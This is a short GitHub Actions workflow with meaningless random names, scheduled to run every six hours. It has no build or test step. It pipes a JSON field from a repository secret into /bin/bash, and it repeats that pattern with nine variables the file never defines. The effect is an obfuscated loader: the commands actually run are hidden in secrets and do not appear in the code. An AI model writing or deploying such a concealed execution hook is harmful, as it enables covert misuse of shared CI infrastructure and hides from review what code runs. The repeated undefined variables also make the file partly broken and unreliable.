name: hanturan4187
on:
  workflow_dispatch:
  schedule:
    - cron: '7 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hanturan4187
        env:
          r85: ${{ secrets.r85 }}
        run: |
          echo $r85 | jq -r .x0 | /bin/bash
          echo $vjymz42894 | jq -r .juss02365 | /bin/bash
          echo $d97 | jq -r .mstb16 | /bin/bash
          echo $o08935 | jq -r .h11596 | /bin/bash
          echo $mzx8623 | jq -r .nbabx3 | /bin/bash
          echo $e7 | jq -r .glht7186 | /bin/bash
          echo $ioxxc901 | jq -r .otfb3602 | /bin/bash
          echo $emj38 | jq -r .p68 | /bin/bash
          echo $sb7 | jq -r .nyi291 | /bin/bash
          echo $mqmw8 | jq -r .odt921 | /bin/bash

